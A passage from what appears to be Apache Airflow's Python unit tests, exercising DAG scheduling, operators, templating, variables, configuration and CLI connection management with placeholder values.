self.runme_0 = self.dag_bash.get_task('runme_0')
self.run_after_loop = self.dag_bash.get_task('run_after_loop')
self.run_this_last = self.dag_bash.get_task('run_this_last')
def test_schedule_dag_no_previous_runs(self):
"""
Tests scheduling a dag with no previous runs
"""
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_no_previous_runs')
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
dag_run = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertEqual(dag.dag_id, dag_run.dag_id)
self.assertIsNotNone(dag_run.run_id)
self.assertNotEqual('', dag_run.run_id)
self.assertEqual(
datetime(2015, 1, 2, 0, 0),
dag_run.execution_date,
msg='dag_run.execution_date did not match expectation: {0}'
.format(dag_run.execution_date)
)
self.assertEqual(State.RUNNING, dag_run.state)
self.assertFalse(dag_run.external_trigger)
dag.clear()
def test_schedule_dag_fake_scheduled_previous(self):
"""
Test scheduling a dag where there is a prior DagRun
which has the same run_id as the next run should have
"""
delta = timedelta(hours=1)
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_fake_scheduled_previous',
schedule_interval=delta,
start_date=DEFAULT_DATE)
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=DEFAULT_DATE))
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
dag.create_dagrun(run_id=models.DagRun.id_for_date(DEFAULT_DATE),
execution_date=DEFAULT_DATE,
state=State.SUCCESS,
external_trigger=True)
dag_run = scheduler.create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertEqual(dag.dag_id, dag_run.dag_id)
self.assertIsNotNone(dag_run.run_id)
self.assertNotEqual('', dag_run.run_id)
self.assertEqual(
DEFAULT_DATE + delta,
dag_run.execution_date,
msg='dag_run.execution_date did not match expectation: {0}'
.format(dag_run.execution_date)
)
self.assertEqual(State.RUNNING, dag_run.state)
self.assertFalse(dag_run.external_trigger)
def test_schedule_dag_once(self):
"""
Tests scheduling a dag scheduled for @once - should be scheduled the first time
it is called, and not scheduled the second.
"""
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_once')
dag.schedule_interval = '@once'
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
dag_run = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
dag_run2 = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertIsNone(dag_run2)
dag.clear()
def test_fractional_seconds(self):
"""
Tests if fractional seconds are stored in the database
"""
dag = DAG(TEST_DAG_ID + 'test_fractional_seconds')
dag.schedule_interval = '@once'
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
start_date = timezone.utcnow()
run = dag.create_dagrun(
run_id='test_' + start_date.isoformat(),
execution_date=start_date,
start_date=start_date,
state=State.RUNNING,
external_trigger=False
)
run.refresh_from_db()
self.assertEqual(start_date, run.execution_date,
"dag run execution_date loses precision")
self.assertEqual(start_date, run.start_date,
"dag run start_date loses precision ")
def test_schedule_dag_start_end_dates(self):
"""
Tests that an attempt to schedule a task after the Dag's end_date
does not succeed.
"""
delta = timedelta(hours=1)
runs = 3
start_date = DEFAULT_DATE
end_date = start_date + (runs - 1) * delta
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_start_end_dates',
start_date=start_date,
end_date=end_date,
schedule_interval=delta)
dag.add_task(models.BaseOperator(task_id='faketastic',
owner='Also fake'))
# Create and schedule the dag runs
dag_runs = []
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
for i in range(runs):
dag_runs.append(scheduler.create_dag_run(dag))
additional_dag_run = scheduler.create_dag_run(dag)
for dag_run in dag_runs:
self.assertIsNotNone(dag_run)
self.assertIsNone(additional_dag_run)
@freeze_time('2016-01-01')
def test_schedule_dag_no_end_date_up_to_today_only(self):
"""
Tests that a Dag created without an end_date can only be scheduled up
to and including the current datetime.
For example, if today is 2016-01-01 and we are scheduling from a
start_date of 2015-01-01, only jobs up to, but not including
2016-01-01 should be scheduled.
"""
session = settings.Session()
delta = timedelta(days=1)
start_date = DEFAULT_DATE
runs = 365
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_no_end_date_up_to_today_only',
start_date=start_date,
schedule_interval=delta)
dag.add_task(models.BaseOperator(task_id='faketastic',
owner='Also fake'))
dag_runs = []
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
for i in range(runs):
dag_run = scheduler.create_dag_run(dag)
dag_runs.append(dag_run)
# Mark the DagRun as complete
dag_run.state = State.SUCCESS
session.merge(dag_run)
session.commit()
# Attempt to schedule an additional dag run (for 2016-01-01)
additional_dag_run = scheduler.create_dag_run(dag)
for dag_run in dag_runs:
self.assertIsNotNone(dag_run)
self.assertIsNone(additional_dag_run)
def test_confirm_unittest_mod(self):
self.assertTrue(configuration.conf.get('core', 'unit_test_mode'))
def test_pickling(self):
dp = self.dag.pickle()
self.assertEqual(dp.pickle.dag_id, self.dag.dag_id)
def test_rich_comparison_ops(self):
class DAGsubclass(DAG):
pass
dag_eq = DAG(TEST_DAG_ID, default_args=self.args)
dag_diff_load_time = DAG(TEST_DAG_ID, default_args=self.args)
dag_diff_name = DAG(TEST_DAG_ID + '_neq', default_args=self.args)
dag_subclass = DAGsubclass(TEST_DAG_ID, default_args=self.args)
dag_subclass_diff_name = DAGsubclass(
TEST_DAG_ID + '2', default_args=self.args)
for d in [dag_eq, dag_diff_name, dag_subclass, dag_subclass_diff_name]:
d.last_loaded = self.dag.last_loaded
# test identity equality
self.assertEqual(self.dag, self.dag)
# test dag (in)equality based on _comps
self.assertEqual(dag_eq, self.dag)
self.assertNotEqual(dag_diff_name, self.dag)
self.assertNotEqual(dag_diff_load_time, self.dag)
# test dag inequality based on type even if _comps happen to match
self.assertNotEqual(dag_subclass, self.dag)
# a dag should equal an unpickled version of itself
d = pickle.dumps(self.dag)
self.assertEqual(pickle.loads(d), self.dag)
# dags are ordered based on dag_id no matter what the type is
self.assertLess(self.dag, dag_diff_name)
self.assertGreater(self.dag, dag_diff_load_time)
self.assertLess(self.dag, dag_subclass_diff_name)
# greater than should have been created automatically by functools
self.assertGreater(dag_diff_name, self.dag)
# hashes are non-random and match equality
self.assertEqual(hash(self.dag), hash(self.dag))
self.assertEqual(hash(dag_eq), hash(self.dag))
self.assertNotEqual(hash(dag_diff_name), hash(self.dag))
self.assertNotEqual(hash(dag_subclass), hash(self.dag))
def test_check_operators(self):
conn_id = "sqlite_default"
captainHook = BaseHook.get_hook(conn_id=conn_id)
captainHook.run("CREATE TABLE operator_test_table (a, b)")
captainHook.run("insert into operator_test_table values (1,2)")
t = CheckOperator(
task_id='check',
sql="select count(*) from operator_test_table",
conn_id=conn_id,
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
t = ValueCheckOperator(
task_id='value_check',
pass_value=95,
tolerance=0.1,
conn_id=conn_id,
sql="SELECT 100",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
captainHook.run("drop table operator_test_table")
def test_clear_api(self):
task = self.dag_bash.tasks[0]
task.clear(
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE,
upstream=True, downstream=True)
ti = models.TaskInstance(task=task, execution_date=DEFAULT_DATE)
ti.are_dependents_done()
def test_illegal_args(self):
"""
Tests that Operators reject illegal arguments
"""
with warnings.catch_warnings(record=True) as w:
t = BashOperator(
task_id='test_illegal_args',
bash_command='echo success',
dag=self.dag,
illegal_argument_1234='hello?')
self.assertTrue(
issubclass(w[0].category, PendingDeprecationWarning))
self.assertIn(
'Invalid arguments were passed to BashOperator.',
w[0].message.args[0])
def test_bash_operator(self):
t = BashOperator(
task_id='test_bash_operator',
bash_command="echo success",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_bash_operator_multi_byte_output(self):
t = BashOperator(
task_id='test_multi_byte_bash_operator',
bash_command=u"echo \u2600",
dag=self.dag,
output_encoding='utf-8')
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_bash_operator_kill(self):
import psutil
sleep_time = "100%d" % os.getpid()
t = BashOperator(
task_id='test_bash_operator_kill',
execution_timeout=timedelta(seconds=1),
bash_command="/bin/bash -c 'sleep %s'" % sleep_time,
dag=self.dag)
self.assertRaises(
exceptions.AirflowTaskTimeout,
t.run,
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE)
sleep(2)
pid = -1
for proc in psutil.process_iter():
if proc.cmdline() == ['sleep', sleep_time]:
pid = proc.pid
if pid != -1:
os.kill(pid, signal.SIGTERM)
self.fail("BashOperator's subprocess still running after stopping on timeout!")
def test_trigger_dagrun(self):
def trigga(context, obj):
if True:
return obj
t = TriggerDagRunOperator(
task_id='test_trigger_dagrun',
trigger_dag_id='example_bash_operator',
python_callable=trigga,
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_dryrun(self):
t = BashOperator(
task_id='test_dryrun',
bash_command="echo success",
dag=self.dag)
t.dry_run()
def test_sqlite(self):
import airflow.operators.sqlite_operator
t = airflow.operators.sqlite_operator.SqliteOperator(
task_id='time_sqlite',
sql="CREATE TABLE IF NOT EXISTS unitest (dummy VARCHAR(20))",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_timeout(self):
t = PythonOperator(
task_id='test_timeout',
execution_timeout=timedelta(seconds=1),
python_callable=lambda: sleep(5),
dag=self.dag)
self.assertRaises(
exceptions.AirflowTaskTimeout,
t.run,
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_python_op(self):
def test_py_op(templates_dict, ds, **kwargs):
if not templates_dict['ds'] == ds:
raise Exception("failure")
t = PythonOperator(
task_id='test_py_op',
provide_context=True,
python_callable=test_py_op,
templates_dict={'ds': "{{ ds }}"},
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_complex_template(self):
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field['bar'][1],
context['ds'])
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field={
'foo': '123',
'bar': ['baz', '{{ ds }}']
},
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_with_variable(self):
"""
Test the availability of variables in templates
"""
val = {
'test_value': 'a test value'
}
Variable.set("a_variable", val['test_value'])
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field,
val['test_value'])
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field='{{ var.value.a_variable }}',
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_with_json_variable(self):
"""
Test the availability of variables (serialized as JSON) in templates
"""
val = {
'test_value': {'foo': 'bar', 'obj': {'v1': 'yes', 'v2': 'no'}}
}
Variable.set("a_variable", val['test_value'], serialize_json=True)
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field,
val['test_value']['obj']['v2'])
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field='{{ var.json.a_variable.obj.v2 }}',
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_with_json_variable_as_value(self):
"""
Test the availability of variables (serialized as JSON) in templates, but
accessed as a value
"""
val = {
'test_value': {'foo': 'bar'}
}
Variable.set("a_variable", val['test_value'], serialize_json=True)
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field,
u'{"foo": "bar"}')
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field='{{ var.value.a_variable }}',
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_non_bool(self):
"""
Test templates can handle objects with no sense of truthiness
"""
class NonBoolObject(object):
def __len__(self):
return NotImplemented
def __bool__(self):
return NotImplemented
t = OperatorSubclass(
task_id='test_bad_template_obj',
some_templated_field=NonBoolObject(),
dag=self.dag)
t.resolve_template_files()
def test_import_examples(self):
self.assertEqual(len(self.dagbag.dags), NUM_EXAMPLE_DAGS)
def test_local_task_job(self):
TI = models.TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
job = jobs.LocalTaskJob(task_instance=ti, ignore_ti_state=True)
job.run()
def test_raw_job(self):
TI = models.TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
ti.dag = self.dag_bash
ti.run(ignore_ti_state=True)
def test_doctests(self):
modules = [utils, macros]
for mod in modules:
failed, tests = doctest.testmod(mod)
if failed:
raise Exception("Failed a doctest")
def test_variable_set_get_round_trip(self):
Variable.set("tested_var_set_id", "Monday morning breakfast")
self.assertEqual("Monday morning breakfast", Variable.get("tested_var_set_id"))
def test_variable_set_get_round_trip_json(self):
value = {"a": 17, "b": 47}
Variable.set("tested_var_set_id", value, serialize_json=True)
self.assertEqual(value, Variable.get("tested_var_set_id", deserialize_json=True))
def test_get_non_existing_var_should_return_default(self):
default_value = "some default val"
self.assertEqual(default_value, Variable.get("thisIdDoesNotExist",
default_var=default_value))
def test_get_non_existing_var_should_not_deserialize_json_default(self):
default_value = "}{ this is a non JSON default }{"
self.assertEqual(default_value, Variable.get("thisIdDoesNotExist",
default_var=default_value,
deserialize_json=True))
def test_variable_setdefault_round_trip(self):
key = "tested_var_setdefault_1_id"
value = "Monday morning breakfast in Paris"
Variable.setdefault(key, value)
self.assertEqual(value, Variable.get(key))
def test_variable_setdefault_round_trip_json(self):
key = "tested_var_setdefault_2_id"
value = {"city": 'Paris', "Hapiness": True}
Variable.setdefault(key, value, deserialize_json=True)
self.assertEqual(value, Variable.get(key, deserialize_json=True))
def test_variable_setdefault_existing_json(self):
key = "tested_var_setdefault_2_id"
value = {"city": 'Paris', "Hapiness": True}
Variable.set(key, value, serialize_json=True)
val = Variable.setdefault(key, value, deserialize_json=True)
# Check the returned value, and the stored value are handled correctly.
self.assertEqual(value, val)
self.assertEqual(value, Variable.get(key, deserialize_json=True))
def test_parameterized_config_gen(self):
cfg = configuration.parameterized_config(configuration.DEFAULT_CONFIG)
# making sure some basic building blocks are present:
self.assertIn("[core]", cfg)
self.assertIn("dags_folder", cfg)
self.assertIn("sql_alchemy_conn", cfg)
self.assertIn("fernet_key", cfg)
# making sure replacement actually happened
self.assertNotIn("{AIRFLOW_HOME}", cfg)
self.assertNotIn("{FERNET_KEY}", cfg)
def test_config_use_original_when_original_and_fallback_are_present(self):
self.assertTrue(configuration.conf.has_option("core", "FERNET_KEY"))
self.assertFalse(configuration.conf.has_option("core", "FERNET_KEY_CMD"))
FERNET_KEY = configuration.conf.get('core', 'FERNET_KEY')
configuration.conf.set("core", "FERNET_KEY_CMD", "printf HELLO")
FALLBACK_FERNET_KEY = configuration.conf.get(
"core",
"FERNET_KEY"
)
self.assertEqual(FERNET_KEY, FALLBACK_FERNET_KEY)
# restore the conf back to the original state
configuration.conf.remove_option("core", "FERNET_KEY_CMD")
def test_config_throw_error_when_original_and_fallback_is_absent(self):
self.assertTrue(configuration.conf.has_option("core", "FERNET_KEY"))
self.assertFalse(configuration.conf.has_option("core", "FERNET_KEY_CMD"))
FERNET_KEY = configuration.conf.get("core", "FERNET_KEY")
configuration.conf.remove_option("core", "FERNET_KEY")
with self.assertRaises(AirflowConfigException) as cm:
configuration.conf.get("core", "FERNET_KEY")
exception = str(cm.exception)
message = "section/key [core/fernet_key] not found in config"
self.assertEqual(message, exception)
# restore the conf back to the original state
configuration.conf.set("core", "FERNET_KEY", FERNET_KEY)
self.assertTrue(configuration.conf.has_option("core", "FERNET_KEY"))
def test_config_override_original_when_non_empty_envvar_is_provided(self):
key = "AIRFLOW__CORE__FERNET_KEY"
value = "some value"
self.assertNotIn(key, os.environ)
os.environ[key] = value
FERNET_KEY = configuration.conf.get('core', 'FERNET_KEY')
self.assertEqual(value, FERNET_KEY)
# restore the envvar back to the original state
del os.environ[key]
def test_config_override_original_when_empty_envvar_is_provided(self):
key = "AIRFLOW__CORE__FERNET_KEY"
value = ""
self.assertNotIn(key, os.environ)
os.environ[key] = value
FERNET_KEY = configuration.conf.get('core', 'FERNET_KEY')
self.assertEqual(value, FERNET_KEY)
# restore the envvar back to the original state
del os.environ[key]
def test_round_time(self):
rt1 = round_time(datetime(2015, 1, 1, 6), timedelta(days=1))
self.assertEqual(datetime(2015, 1, 1, 0, 0), rt1)
rt2 = round_time(datetime(2015, 1, 2), relativedelta(months=1))
self.assertEqual(datetime(2015, 1, 1, 0, 0), rt2)
rt3 = round_time(datetime(2015, 9, 16, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 16, 0, 0), rt3)
rt4 = round_time(datetime(2015, 9, 15, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 15, 0, 0), rt4)
rt5 = round_time(datetime(2015, 9, 14, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 14, 0, 0), rt5)
rt6 = round_time(datetime(2015, 9, 13, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 14, 0, 0), rt6)
def test_infer_time_unit(self):
self.assertEqual('minutes', infer_time_unit([130, 5400, 10]))
self.assertEqual('seconds', infer_time_unit([110, 50, 10, 100]))
self.assertEqual('hours', infer_time_unit([100000, 50000, 10000, 20000]))
self.assertEqual('days', infer_time_unit([200000, 100000]))
def test_scale_time_units(self):
# use assert_almost_equal from numpy.testing since we are comparing
# floating point arrays
arr1 = scale_time_units([130, 5400, 10], 'minutes')
assert_array_almost_equal(arr1, [2.167, 90.0, 0.167], decimal=3)
arr2 = scale_time_units([110, 50, 10, 100], 'seconds')
assert_array_almost_equal(arr2, [110.0, 50.0, 10.0, 100.0], decimal=3)
arr3 = scale_time_units([100000, 50000, 10000, 20000], 'hours')
assert_array_almost_equal(arr3, [27.778, 13.889, 2.778, 5.556],
decimal=3)
arr4 = scale_time_units([200000, 100000], 'days')
assert_array_almost_equal(arr4, [2.315, 1.157], decimal=3)
def test_duplicate_dependencies(self):
regexp = "Dependency (.*)runme_0(.*)run_after_loop(.*) " \
"already registered"
with self.assertRaisesRegexp(AirflowException, regexp):
self.runme_0.set_downstream(self.run_after_loop)
with self.assertRaisesRegexp(AirflowException, regexp):
self.run_after_loop.set_upstream(self.runme_0)
def test_bad_trigger_rule(self):
with self.assertRaises(AirflowException):
DummyOperator(
task_id='test_bad_trigger',
trigger_rule="non_existant",
dag=self.dag)
def test_terminate_task(self):
"""If a task instance's db state get deleted, it should fail"""
TI = models.TaskInstance
dag = self.dagbag.dags.get('test_utils')
task = dag.task_dict.get('sleeps_forever')
ti = TI(task=task, execution_date=DEFAULT_DATE)
job = jobs.LocalTaskJob(
task_instance=ti, ignore_ti_state=True, executor=SequentialExecutor())
# Running task instance asynchronously
p = multiprocessing.Process(target=job.run)
p.start()
sleep(5)
settings.engine.dispose()
session = settings.Session()
ti.refresh_from_db(session=session)
# making sure it's actually running
self.assertEqual(State.RUNNING, ti.state)
ti = session.query(TI).filter_by(
dag_id=task.dag_id,
task_id=task.task_id,
execution_date=DEFAULT_DATE
).one()
# deleting the instance should result in a failure
session.delete(ti)
session.commit()
# waiting for the async task to finish
p.join()
# making sure that the task ended up as failed
ti.refresh_from_db(session=session)
self.assertEqual(State.FAILED, ti.state)
session.close()
def test_task_fail_duration(self):
"""If a task fails, the duration should be recorded in TaskFail"""
p = BashOperator(
task_id='pass_sleepy',
bash_command='sleep 3',
dag=self.dag)
f = BashOperator(
task_id='fail_sleepy',
bash_command='sleep 5',
execution_timeout=timedelta(seconds=3),
retry_delay=timedelta(seconds=0),
dag=self.dag)
session = settings.Session()
try:
p.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
except:
pass
try:
f.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
except:
pass
p_fails = session.query(models.TaskFail).filter_by(
task_id='pass_sleepy',
dag_id=self.dag.dag_id,
execution_date=DEFAULT_DATE).all()
f_fails = session.query(models.TaskFail).filter_by(
task_id='fail_sleepy',
dag_id=self.dag.dag_id,
execution_date=DEFAULT_DATE).all()
print(f_fails)
self.assertEqual(0, len(p_fails))
self.assertEqual(1, len(f_fails))
# C
self.assertGreaterEqual(sum([f.duration for f in f_fails]), 3)
def test_dag_stats(self):
"""Correctly sets/dirties/cleans rows of DagStat table"""
session = settings.Session()
session.query(models.DagRun).delete()
session.query(models.DagStat).delete()
session.commit()
models.DagStat.update([], session=session)
run1 = self.dag_bash.create_dagrun(
run_id="run1",
execution_date=DEFAULT_DATE,
state=State.RUNNING)
models.DagStat.update([self.dag_bash.dag_id], session=session)
qry = session.query(models.DagStat).all()
self.assertEqual(3, len(qry))
self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id)
for stats in qry:
if stats.state == State.RUNNING:
self.assertEqual(stats.count, 1)
else:
self.assertEqual(stats.count, 0)
self.assertFalse(stats.dirty)
run2 = self.dag_bash.create_dagrun(
run_id="run2",
execution_date=DEFAULT_DATE + timedelta(days=1),
state=State.RUNNING)
models.DagStat.update([self.dag_bash.dag_id], session=session)
qry = session.query(models.DagStat).all()
self.assertEqual(3, len(qry))
self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id)
for stats in qry:
if stats.state == State.RUNNING:
self.assertEqual(stats.count, 2)
else:
self.assertEqual(stats.count, 0)
self.assertFalse(stats.dirty)
session.query(models.DagRun).first().state = State.SUCCESS
session.commit()
models.DagStat.update([self.dag_bash.dag_id], session=session)
qry = session.query(models.DagStat).filter(models.DagStat.state == State.SUCCESS).all()
self.assertEqual(1, len(qry))
self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id)
self.assertEqual(State.SUCCESS, qry[0].state)
self.assertEqual(1, qry[0].count)
self.assertFalse(qry[0].dirty)
qry = session.query(models.DagStat).filter(models.DagStat.state == State.RUNNING).all()
self.assertEqual(1, len(qry))
self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id)
self.assertEqual(State.RUNNING, qry[0].state)
self.assertEqual(1, qry[0].count)
self.assertFalse(qry[0].dirty)
session.query(models.DagRun).delete()
session.query(models.DagStat).delete()
session.commit()
session.close()
def test_run_command(self):
if six.PY3:
write = r'sys.stdout.buffer.write("\u1000foo".encode("utf8"))'
else:
write = r'sys.stdout.write(u"\u1000foo".encode("utf8"))'
cmd = 'import sys; {0}; sys.stdout.flush()'.format(write)
self.assertEqual(run_command("python -c '{0}'".format(cmd)),
u'\u1000foo' if six.PY3 else 'foo')
self.assertEqual(run_command('echo "foo bar"'), u'foo bar\n')
self.assertRaises(AirflowConfigException, run_command, 'bash -c "exit 1"')
class CliTests(unittest.TestCase):
@classmethod
def setUpClass(cls):
super(CliTests, cls).setUpClass()
cls._cleanup()
def setUp(self):
super(CliTests, self).setUp()
configuration.load_test_config()
app = application.create_app()
app.config['TESTING'] = True
self.parser = cli.CLIFactory.get_parser()
self.dagbag = models.DagBag(dag_folder=DEV_NULL, include_examples=True)
self.session = Session()
def tearDown(self):
self._cleanup(session=self.session)
super(CliTests, self).tearDown()
@staticmethod
def _cleanup(session=None):
if session is None:
session = Session()
session.query(models.Pool).delete()
session.query(models.Variable).delete()
session.commit()
session.close()
def test_cli_list_dags(self):
args = self.parser.parse_args(['list_dags', '--report'])
cli.list_dags(args)
def test_cli_create_user_random_password(self):
args = self.parser.parse_args([
'create_user', '-u', 'test1', '-l', 'doe', '-f', 'jon',
'-e', 'jdoe@foo.com', '-r', 'Viewer', '--use_random_password'
])
cli.create_user(args)
def test_cli_create_user_supplied_password(self):
args = self.parser.parse_args([
'create_user', '-u', 'test2', '-l', 'doe', '-f', 'jon',
'-e', 'jdoe@apache.org', '-r', 'Viewer', '-p', 'test'
])
cli.create_user(args)
def test_cli_list_tasks(self):
for dag_id in self.dagbag.dags.keys():
args = self.parser.parse_args(['list_tasks', dag_id])
cli.list_tasks(args)
args = self.parser.parse_args([
'list_tasks', 'example_bash_operator', '--tree'])
cli.list_tasks(args)
@mock.patch("airflow.bin.cli.db_utils.initdb")
def test_cli_initdb(self, initdb_mock):
cli.initdb(self.parser.parse_args(['initdb']))
initdb_mock.assert_called_once_with(False)
@mock.patch("airflow.bin.cli.db_utils.resetdb")
def test_cli_resetdb(self, resetdb_mock):
cli.resetdb(self.parser.parse_args(['resetdb', '--yes']))
resetdb_mock.assert_called_once_with(False)
def test_cli_connections_list(self):
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(['connections', '--list']))
stdout = mock_stdout.getvalue()
conns = [[x.strip("'") for x in re.findall("'\w+'", line)[:2]]
for ii, line in enumerate(stdout.split('\n'))
if ii % 2 == 1]
conns = [conn for conn in conns if len(conn) > 0]
# Assert that some of the connections are present in the output as
# expected:
self.assertIn(['aws_default', 'aws'], conns)
self.assertIn(['beeline_default', 'beeline'], conns)
self.assertIn(['emr_default', 'emr'], conns)
self.assertIn(['mssql_default', 'mssql'], conns)
self.assertIn(['mysql_default', 'mysql'], conns)
self.assertIn(['postgres_default', 'postgres'], conns)
self.assertIn(['wasb_default', 'wasb'], conns)
self.assertIn(['segment_default', 'segment'], conns)
# Attempt to list connections with invalid cli args
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--list', '--conn_id=fake', '--conn_uri=fake-uri',
'--conn_type=fake-type', '--conn_host=fake_host',
'--conn_login=fake_login', '--conn_password=fake_password',
'--conn_schema=fake_schema', '--conn_port=fake_port', '--conn_extra=fake_extra']))
stdout = mock_stdout.getvalue()
# Check list attempt stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are not compatible with the " +
"--list flag: ['conn_id', 'conn_uri', 'conn_extra', " +
"'conn_type', 'conn_host', 'conn_login', " +
"'conn_password', 'conn_schema', 'conn_port']"),
])
def test_cli_connections_list_redirect(self):
cmd = ['airflow', 'connections', '--list']
with tempfile.TemporaryFile() as fp:
p = subprocess.Popen(cmd, stdout=fp)
p.wait()
self.assertEqual(0, p.returncode)
def test_cli_connections_add_delete(self):
# Add connections:
uri = 'postgresql://airflow:airflow@host:5432/airflow'
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new1',
'--conn_uri=%s' % uri]))
cli.connections(self.parser.parse_args(
['connections', '-a', '--conn_id=new2',
'--conn_uri=%s' % uri]))
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new3',
'--conn_uri=%s' % uri, '--conn_extra', "{'extra': 'yes'}"]))
cli.connections(self.parser.parse_args(
['connections', '-a', '--conn_id=new4',
'--conn_uri=%s' % uri, '--conn_extra', "{'extra': 'yes'}"]))
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new5',
'--conn_type=hive_metastore', '--conn_login=airflow',
'--conn_password=airflow', '--conn_host=host',
'--conn_port=9083', '--conn_schema=airflow']))
cli.connections(self.parser.parse_args(
['connections', '-a', '--conn_id=new6',
'--conn_uri', "", '--conn_type=google_cloud_platform', '--conn_extra', "{'extra': 'yes'}"]))
stdout = mock_stdout.getvalue()
# Check addition stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tSuccessfully added `conn_id`=new1 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new2 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new3 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new4 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new5 : " +
"hive_metastore://airflow:airflow@host:9083/airflow"),
("\tSuccessfully added `conn_id`=new6 : " +
"google_cloud_platform://:@:")
])
# Attempt to add duplicate
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new1',
'--conn_uri=%s' % uri]))
stdout = mock_stdout.getvalue()
# Check stdout for addition attempt
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
"\tA connection with `conn_id`=new1 already exists",
])
# Attempt to add without providing conn_id
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_uri=%s' % uri]))
stdout = mock_stdout.getvalue()
# Check stdout for addition attempt
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are required to add a connection:" +
" ['conn_id']"),
])
# Attempt to add without providing conn_uri
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new']))
stdout = mock_stdout.getvalue()
# Check stdout for addition attempt
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are required to add a connection:" +
" ['conn_uri or conn_type']"),
])
# Prepare to add connections
session = settings.Session()
extra = {'new1': None,
